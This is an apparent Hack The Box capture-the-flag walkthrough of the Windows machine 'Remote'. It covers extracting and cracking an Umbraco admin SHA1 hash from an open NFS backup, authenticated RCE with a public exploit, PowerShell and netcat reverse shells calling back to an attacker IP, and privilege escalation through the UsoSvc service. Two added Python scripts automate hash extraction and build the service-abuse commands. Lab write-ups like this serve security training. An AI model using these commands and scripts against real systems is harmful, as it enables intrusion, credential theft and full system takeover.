
Remote

Machine Name: Remote - HTB
Difficulty: Easy
OS: Windows

Walkthrough

nmap scan (all TCP ports, service and OS detection):


┌──(root💀kali)-[~]                                                                            
└─# nmap 10.10.10.180 -p- -A -T4 -Pn                                                           
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 18:55 EDT
Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 18:56 (0:00:07 remaining)
Nmap scan report for 10.10.10.180                                                                                                                                                             
Host is up (0.074s latency).                                                                   
Not shown: 65528 filtered ports
PORT      STATE SERVICE       VERSION                                                          
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:           
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000) 
| rpcinfo:         
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs                                                                                                                                                        
|   100003  2,3,4       2049/tcp   nfs                                                         
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005) 
49666/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-05T22:57:36
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   74.57 ms 10.10.14.1
2   75.16 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.09 seconds

FTP turned up nothing. After looking at port 80, the only thing I found was that the site runs Umbraco CMS. There are public exploits for this CMS, but they need valid credentials, so I kept enumerating.


┌──(root💀kali)-[~/10.10.10.180]                                                               
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.180/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt --extensions aspx,html,txt | tee gobuster1
===============================================================    
Gobuster v3.1.0                                                                                
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)      
===============================================================    
[+] Url:                     http://10.10.10.180/                  
[+] Method:                  GET                                                               
[+] Threads:                 50                                                                
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt     
[+] Negative Status codes:   404                                                               
[+] User Agent:              gobuster/3.1.0                                                    
[+] Extensions:              aspx,html,txt                                                     
[+] Add Slash:               true                                                              
[+] Follow Redirect:         true                                                              
[+] Expanded:                true                                                              
[+] Timeout:                 10s                                                               
===============================================================     
2021/10/05 19:37:40 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.180/1111/                (Status: 200) [Size: 4196]
http://10.10.10.180/1111.aspx            (Status: 200) [Size: 4196]
http://10.10.10.180/Base/                (Status: 400) [Size: 11]  
http://10.10.10.180/Blog.aspx            (Status: 200) [Size: 5001]
http://10.10.10.180/Contact/             (Status: 200) [Size: 7880]
http://10.10.10.180/Blog/                (Status: 200) [Size: 5001]
http://10.10.10.180/Contact.aspx         (Status: 200) [Size: 7880]
http://10.10.10.180/Home/                (Status: 200) [Size: 6703]
http://10.10.10.180/Default.aspx         (Status: 200) [Size: 6693]
http://10.10.10.180/Home.aspx            (Status: 200) [Size: 6703]
http://10.10.10.180/People/              (Status: 200) [Size: 6749]
http://10.10.10.180/Products/            (Status: 200) [Size: 5338]
http://10.10.10.180/People.aspx          (Status: 200) [Size: 6749]
http://10.10.10.180/Products.aspx        (Status: 200) [Size: 5338]
http://10.10.10.180/about-us/            (Status: 200) [Size: 5451]
http://10.10.10.180/about-us.aspx        (Status: 200) [Size: 5451]
http://10.10.10.180/base/                (Status: 400) [Size: 11]  
http://10.10.10.180/blog/                (Status: 200) [Size: 5011]
http://10.10.10.180/blog.aspx            (Status: 200) [Size: 5011]
http://10.10.10.180/contact.aspx         (Status: 200) [Size: 7890]
http://10.10.10.180/contact/             (Status: 200) [Size: 7890]
http://10.10.10.180/default.aspx         (Status: 200) [Size: 6693]
http://10.10.10.180/home/                (Status: 200) [Size: 6703]
http://10.10.10.180/home.aspx            (Status: 200) [Size: 6703]
http://10.10.10.180/install/             (Status: 200) [Size: 4040]
http://10.10.10.180/intranet/            (Status: 200) [Size: 3323]
http://10.10.10.180/intranet.aspx        (Status: 200) [Size: 3323]
http://10.10.10.180/master/              (Status: 500) [Size: 3420]
http://10.10.10.180/master.aspx          (Status: 500) [Size: 3420]
http://10.10.10.180/people/              (Status: 200) [Size: 6739]
http://10.10.10.180/people.aspx          (Status: 200) [Size: 6739]
http://10.10.10.180/person.aspx          (Status: 200) [Size: 2741]
http://10.10.10.180/person/              (Status: 200) [Size: 2741]
http://10.10.10.180/product/             (Status: 500) [Size: 3420]
http://10.10.10.180/product.aspx         (Status: 500) [Size: 3420]
http://10.10.10.180/products.aspx        (Status: 200) [Size: 5328]
http://10.10.10.180/products/            (Status: 200) [Size: 5328]
http://10.10.10.180/umbraco/             (Status: 200) [Size: 4040]

===============================================================
2021/10/05 19:54:46 Finished
===============================================================

┌──(root💀kali)-[~]
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.180/umbraco/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt --extensions aspx,html,txt | tee 10.10.10.180/gobuster2
===============================================================            
Gobuster v3.1.0                                                                                
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)              
===============================================================            
[+] Url:                     http://10.10.10.180/umbraco/                  
[+] Method:                  GET                                                               
[+] Threads:                 50                                                                
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt             
[+] Negative Status codes:   404                                                               
[+] User Agent:              gobuster/3.1.0                                                    
[+] Extensions:              aspx,html,txt                                                     
[+] Add Slash:               true                                                              
[+] Follow Redirect:         true                                                              
[+] Expanded:                true                                                              
[+] Timeout:                 10s                                                               
===============================================================            
2021/10/05 19:38:28 Starting gobuster in directory enumeration mode        
===============================================================           
http://10.10.10.180/umbraco/Default/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/Members/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/Search/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/actions/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/application/         (Status: 200) [Size: 2934]
http://10.10.10.180/umbraco/assets/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/config/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/controls/            (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/create.aspx          (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/create/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/dashboard/           (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/default/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/developer/           (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/dialogs/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/install/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/js/                  (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/lib/                 (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/logout.aspx          (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/masterpages/         (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/members/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/ping.aspx            (Status: 200) [Size: 12]  
http://10.10.10.180/umbraco/plugins/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/preview/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/search/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/settings/            (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/translation/         (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/tree.aspx            (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/views/               (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/webservices/         (Status: 403) [Size: 1233]

===============================================================
2021/10/05 19:55:16 Finished
===============================================================

Next I looked at NFS, which nmap showed on 111/2049. The export is open to everyone:

┌──(root💀kali)-[~]
└─# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

┌──(root💀kali)-[~]
└─# mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180                      

┌──(root💀kali)-[~]
└─# cd /mnt/10.10.10.180

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

I spent a long time looking around inside, but there are far too many files, so we need to narrow the search.

Looking at https://our.umbraco.com/forum/umbraco-7/using-umbraco-7/74780-how-do-i-check-what-db-umbraco-is-using I saw that the database connection details are kept in the config files under the umbracoDbDSN key, so I searched for that keyword.


┌──(root💀kali)-[/mnt/10.10.10.180]
└─# grep -R "umbracoDbDSN" . | grep -v 'Lang'
grep: ./bin/Umbraco.Core.dll: binary file matches
./Web.config:           <remove name="umbracoDbDSN" />
./Web.config:           <add name="umbracoDbDSN" connectionString="Data Source=|DataDirectory|\Umbraco.sdf;Flush Interval=1;" providerName="System.Data.SqlServerCe.4.0" />
┌──(root💀kali)-[/mnt/10.10.10.180]
└─# find . -name '*Umbraco.sdf*' -exec ls -al {} \; 2>/dev/null 
-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 ./App_Data/Umbraco.sdf

The connection string points at |DataDirectory|\Umbraco.sdf, i.e. App_Data\Umbraco.sdf, and the provider is SQL Server Compact (SqlServerCe.4.0). The file is binary:

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# file ./App_Data/Umbraco.sdf                                 
./App_Data/Umbraco.sdf: data

https://fileinfo.com/extension/sdf confirms this is a SQL Server Compact database file. Rather than open it with a SQL CE client, I started pulling strings out of it and looked for the admin's email address:


┌──(root💀kali)-[/mnt/10.10.10.180]
└─# strings ./App_Data/Umbraco.sdf | nl | grep '[email protected]' | head
     4  [email protected]{"hashAlgorithm":"SHA1"}[email protected]
     5  [email protected]{"hashAlgorithm":"SHA1"}[email protected]
  1109  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
  1110  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
  1111  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
  1112  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
  1113  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
  1114  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
  1115  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
  1116  User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity

We have the admin user's password hash, stored next to a {"hashAlgorithm":"SHA1"} marker; the audit rows around it also show logins from 192.168.195.1 and a second backoffice user, smith. I then tried to crack it with john, treating it as an unsalted SHA1 (Raw-SHA1):

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# john /root/10.10.10.180/hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   ([email protected])
1g 0:00:00:01 DONE (2021-10-06 18:21) 0.8547g/s 8396Kp/s 8396Kc/s 8396KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
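The extraction and crack above, as an added example (this is not code from the original post or from Umbraco): a small Python script that finds Umbraco 7 user rows in a raw Umbraco.sdf dump by the same marker the strings output shows, writes them in the user:hash form that john --format=Raw-SHA1 expects, and verifies a candidate password locally. It assumes the password is stored as a 40-hex-character SHA1 digest immediately before the {"hashAlgorithm":"SHA1"} literal with the account's email right after it (consistent with the Raw-SHA1 format that cracked it above). The sample blob, the placeholder address admin@example.local and the column layout around the marker are constructed for illustration.

```python
"""Extract Umbraco 7 user password hashes from a raw Umbraco.sdf (SQL Server Compact) file.

Added example for this walkthrough, not code from the original post or from Umbraco.
Assumptions: the user row stores the password as a 40-hex-char SHA1 digest immediately
before the literal {"hashAlgorithm":"SHA1"} and the account's email immediately after it.
The sample blob built below is constructed; admin@example.local is a placeholder.
"""
import hashlib
import re
import sys

MARKER = b'{"hashAlgorithm":"SHA1"}'

# <40 hex chars><marker><email>. The email ends at the first byte that cannot belong to an
# address, which is what separates it from the next (binary) column of the row.
ROW_RE = re.compile(
    rb"([0-9a-fA-F]{40})"
    + re.escape(MARKER)
    + rb"([A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[a-z]{2,})+)"
)


def extract_umbraco_hashes(blob: bytes) -> list[tuple[str, str]]:
    """Return (email, sha1_hex) pairs for every user row found in the raw file bytes."""
    return [(email.decode("ascii"), digest.decode("ascii").lower())
            for digest, email in ROW_RE.findall(blob)]


def to_john_lines(rows: list[tuple[str, str]]) -> list[str]:
    """Format rows as 'user:hash' lines for `john --format=Raw-SHA1`."""
    return [f"{email}:{digest}" for email, digest in rows]


def check_candidate(sha1_hex: str, candidate: str) -> bool:
    """True if candidate is the preimage of the unsalted SHA1 digest (what john confirmed)."""
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest() == sha1_hex.lower()


def build_sample_blob(password: str) -> bytes:
    """Constructed stand-in for one Umbraco.sdf user row: login, digest, marker, email, next column."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().encode("ascii")
    return (
        b"\x00\x05admin"             # userName with a fake length prefix (constructed)
        + b"admin@example.local"     # userLogin
        + digest                     # userPassword as SHA1 hex
        + MARKER                     # passwordConfig
        + b"admin@example.local"     # userEmail
        + b"\x00\x05en-US\x00"       # userLanguage and padding (constructed)
    )


if __name__ == "__main__":
    # Usage: python3 umbraco_sdf_hashes.py /mnt/10.10.10.180/App_Data/Umbraco.sdf > hash
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_sample_blob("baconandcheese")  # constructed demo input
    for line in to_john_lines(extract_umbraco_hashes(data)):
        print(line)
```

Point it at the mounted backup and feed the output straight to john; check_candidate is there to confirm a cracked password offline before you spend it against the backoffice login.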

Next I decided to try the exploits I had found. searchsploit lists two authenticated RCE scripts for Umbraco 7.12.4; since we now have valid backoffice credentials, 49488.py fits:

┌──(root💀kali)-[~/10.10.10.180]                                                                                                                              
└─# searchsploit Umbraco CMS                                                                                                                                  
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path                           
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                         | windows/webapps/19671.rb        
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                  | aspx/webapps/46153.py           
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                  | aspx/webapps/49488.py           
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                  | php/webapps/44988.txt           
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results                                                                                                                                        
Papers: No Results                                                                                                                                            

┌──(root💀kali)-[~/10.10.10.180]                                                                                                                              
└─# searchsploit -m aspx/webapps/49488.py                                                                                                                     
  Exploit: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                                         
      URL: https://www.exploit-db.com/exploits/49488                                                                                                          
     Path: /usr/share/exploitdb/exploits/aspx/webapps/49488.py                                                                                                
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators                                                             

Copied to: /root/10.10.10.180/49488.py                                                                                                                        
┌──(root💀kali)-[~/10.10.10.180]
└─# python3 49488.py -u [email protected] -p baconandcheese -i http://10.10.10.180 -c hostname
remote

The command runs as the web application's identity, so now we can get a reverse shell.


┌──(root💀kali)-[/opt]
└─# wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Will not apply HSTS. The HSTS database must be a regular and non-world-writable file.
ERROR: could not open HSTS store at '/root/.wget-hsts'. HSTS will be disabled.
--2021-10-06 19:14:00--  https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: ‘Invoke-PowerShellTcp.ps1’

Invoke-PowerShellTcp.ps1                100%[=============================================================================>]   4.24K  --.-KB/s    in 0s      

2021-10-06 19:14:01 (25.2 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]

┌──(root💀kali)-[/opt]
└─# nano Invoke-PowerShellTcp.ps1 

┌──(root💀kali)-[/opt]
└─# tail Invoke-PowerShellTcp.ps1 
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.21 -Port 443

I appended the call at the end of Invoke-PowerShellTcp.ps1 so the script connects back to my listener on 10.10.14.21:443 as soon as it is loaded, served it from a web server on 10.10.14.21, and triggered the download cradle through the exploit:


┌──(root💀kali)-[~/10.10.10.180]
└─# python3 49488.py -u [email protected] -p baconandcheese -i http://10.10.10.180 -c 'powershell.exe' -a "iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.21/Invoke-PowerShellTcp.ps1'));"

┌──(root💀kali)-[~]
└─# nc -lvp 443
listening on [any] 443 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49694
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:/Users
PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/9/2021   6:50 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---        2/20/2020   2:42 AM                Public                                                                

PS C:\Users> cd Public
PS C:\Users\Public> dir

    Directory: C:\Users\Public

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                
-ar---        10/6/2021   5:53 PM             34 user.txt                                                              

PS C:\Users\Public> cat user.txt
b44487ceb09f1a33d682e163f098182f

After an AMSI bypass, I started downloading my privilege escalation scripts. PowerUp's Invoke-AllChecks reported:


PS C:\Users\Public> iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.21/PowerUp.ps1'));
PS C:\Users\Public> Invoke-AllChecks                    

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2452
ProcessId   : 3040
Name        : 3040
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

PS C:\Users\Public> Get-ChildItem : Access to the path 'C:\ProgramData\USOPrivate' is denied.
At line:4516 char:21
+ ... $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.x ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\ProgramData\USOPrivate:String) [Get-ChildItem], UnauthorizedAccess 
   Exception
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

This looks easy. PowerUp lists UsoSvc under "Modifiable Services": the service's DACL lets our app-pool identity change its configuration and restart it (CanRestart: True). Note that this is not an unquoted service path issue (the path C:\Windows\system32\svchost.exe -k netsvcs -p contains no spaces); it is a service configuration abuse, which Invoke-ServiceAbuse automates. With no -Command it rewrites binPath so that the service creates a local user john with password Password123! and adds it to Administrators, starts the service, then restores the original binPath. SeImpersonatePrivilege is also enabled, which would be an alternative route. Let's try it.


PS C:\Users\Public> Invoke-ServiceAbuse -Name 'UsoSvc'                                                                                                        

ServiceAbused Command                                                                                                                                         
------------- -------                                                                                                                                         
UsoSvc        net user john Password123! /add && net localgroup Administrators john /add  

PS C:\Users\Public> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
The command completed successfully.
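What PowerUp's "Modifiable Services" finding actually means, as an added example (not code from the original post or from PowerUp): the service's security descriptor grants a group in our token the right to change the service configuration. This Python parses the SDDL string that sc.exe sdshow UsoSvc prints on the target, checks it against the SIDs reported by whoami /groups, and prints the sc.exe sequence that Invoke-ServiceAbuse performs by hand. SAMPLE_SDDL and the token SIDs used in the demo are constructed for illustration and are not UsoSvc's real descriptor.

```python
"""Check from a service's SDDL whether a token can reconfigure it (PowerUp's "Modifiable
Services" condition) and build the manual sc.exe equivalent of Invoke-ServiceAbuse.

Added example for this walkthrough; not code from the original post or from PowerUp.
Input is the string `sc.exe sdshow <service>` prints on the target plus the SIDs from
`whoami /groups`. SAMPLE_SDDL is constructed for illustration, not UsoSvc's real descriptor.
"""
import re

# SDDL right codes as applied to service objects -> access-mask bits.
SDDL_RIGHTS = {
    "CC": 0x0001, "DC": 0x0002, "LC": 0x0004, "SW": 0x0008,  # query config, CHANGE_CONFIG, status, deps
    "RP": 0x0010, "WP": 0x0020, "DT": 0x0040, "LO": 0x0080,  # start, stop, pause/continue, interrogate
    "CR": 0x0100, "SD": 0x00010000, "RC": 0x00020000,         # user control, delete, read control
    "WD": 0x00040000, "WO": 0x00080000,                       # WRITE_DAC, WRITE_OWNER
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,  # generic rights
}
# Any of these lets the holder end up controlling binPath (WD/WO need one extra step).
MODIFY_RIGHTS = {"SERVICE_CHANGE_CONFIG": SDDL_RIGHTS["DC"], "WRITE_DAC": SDDL_RIGHTS["WD"],
                 "WRITE_OWNER": SDDL_RIGHTS["WO"], "GENERIC_WRITE": SDDL_RIGHTS["GW"],
                 "GENERIC_ALL": SDDL_RIGHTS["GA"]}
# Well-known SDDL abbreviations, so SIDs from `whoami /groups` match the ACE trustees.
WELL_KNOWN = {"WD": "S-1-1-0", "AU": "S-1-5-11", "IU": "S-1-5-4", "SU": "S-1-5-6",
              "SY": "S-1-5-18", "LS": "S-1-5-19", "NS": "S-1-5-20",
              "BA": "S-1-5-32-544", "BU": "S-1-5-32-545"}
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# Constructed sample: Authenticated Users (AU) may change config, start and stop the service.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_rights(field: str) -> int:
    """SDDL rights field (two-letter codes, or a 0x hex mask) -> access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= SDDL_RIGHTS[field[i:i + 2]]
    return mask


def parse_dacl(sddl: str) -> list[tuple[str, int, str]]:
    """(ace_type, mask, trustee SID) for each ACE in the D: section; abbreviations expanded."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    return [(ace_type, parse_rights(rights), WELL_KNOWN.get(sid, sid))
            for ace_type, _flags, rights, _obj, _inh, sid in ACE_RE.findall(m.group(1))]


def effective_mask(sddl: str, token_sids) -> int:
    """Bits allowed to any SID in the token minus bits explicitly denied to any of them
    (matches Windows' evaluation for a canonically ordered DACL, deny ACEs first)."""
    sids = {WELL_KNOWN.get(s, s) for s in token_sids}
    allowed = denied = 0
    for ace_type, mask, sid in parse_dacl(sddl):
        if sid in sids:
            if ace_type == "A":
                allowed |= mask
            elif ace_type == "D":
                denied |= mask
    return allowed & ~denied


def modifiable_rights(sddl: str, token_sids) -> list[str]:
    """Names of config-changing rights the token holds; empty means no service abuse here."""
    mask = effective_mask(sddl, token_sids)
    return sorted(name for name, bit in MODIFY_RIGHTS.items() if mask & bit)


def can_restart(sddl: str, token_sids) -> bool:
    """True if the token can stop and start the service, i.e. trigger the new binPath itself."""
    mask = effective_mask(sddl, token_sids)
    return bool(mask & SDDL_RIGHTS["RP"]) and bool(mask & SDDL_RIGHTS["WP"])


def sc_abuse_commands(service: str, payload: str, original_binpath: str) -> list[str]:
    """The sequence Invoke-ServiceAbuse automates: stop, swap binPath, start, restore binPath.
    sc.exe requires the space after 'binPath='."""
    return [f"sc.exe stop {service}",
            f'sc.exe config {service} binPath= "{payload}"',
            f"sc.exe start {service}",
            f'sc.exe config {service} binPath= "{original_binpath}"']


if __name__ == "__main__":
    token = ["S-1-5-11", "S-1-1-0"]  # Authenticated Users, Everyone: assumed app-pool token groups
    print("modifiable via:", modifiable_rights(SAMPLE_SDDL, token),
          "| can restart:", can_restart(SAMPLE_SDDL, token))
    for cmd in sc_abuse_commands("UsoSvc", "C:\\Windows\\Temp\\nc64.exe 10.10.14.21 4444 -e cmd.exe",
                                 "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"):
        print(cmd)
```

Run sc.exe sdshow UsoSvc and whoami /groups on the box, feed both in, and look for SERVICE_CHANGE_CONFIG (WRITE_DAC or WRITE_OWNER get you there in two steps). Two caveats when you build the binPath payload: sc.exe runs it as the service image, so chaining with && needs cmd.exe /c in front, and a shell spawned this way is the child of a service start that never reports back to the Service Control Manager, so it may be killed once the start times out; do what you need quickly or use it to launch something that survives on its own.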

That works, but rather than log in as john I want to drop nc.exe on the box and get a shell straight from the service. First I checked whether the OS is 64-bit so I pick the right binary. (Remember to delete the john account afterwards; the default Invoke-ServiceAbuse run leaves a local administrator behind.)


PS C:\Users\Public> [System.Environment]::Is64BitOperatingSystem
True

PS C:\Windows\Temp>                                                                                                                                           
PS C:\Windows\Temp> Invoke-WebRequest -Uri "http://10.10.14.21/nc64.exe" -OutFile "C:\Windows\Temp\nc64.exe" 

PS C:\Windows\Temp>  Invoke-ServiceAbuse -Name UsoSvc -Command "C:\Windows\Temp\nc64.exe 10.10.14.21 4444 -e cmd.exe"

┌──(root💀kali)-[/opt/PowerSploit/Privesc]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49692
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D582-9880

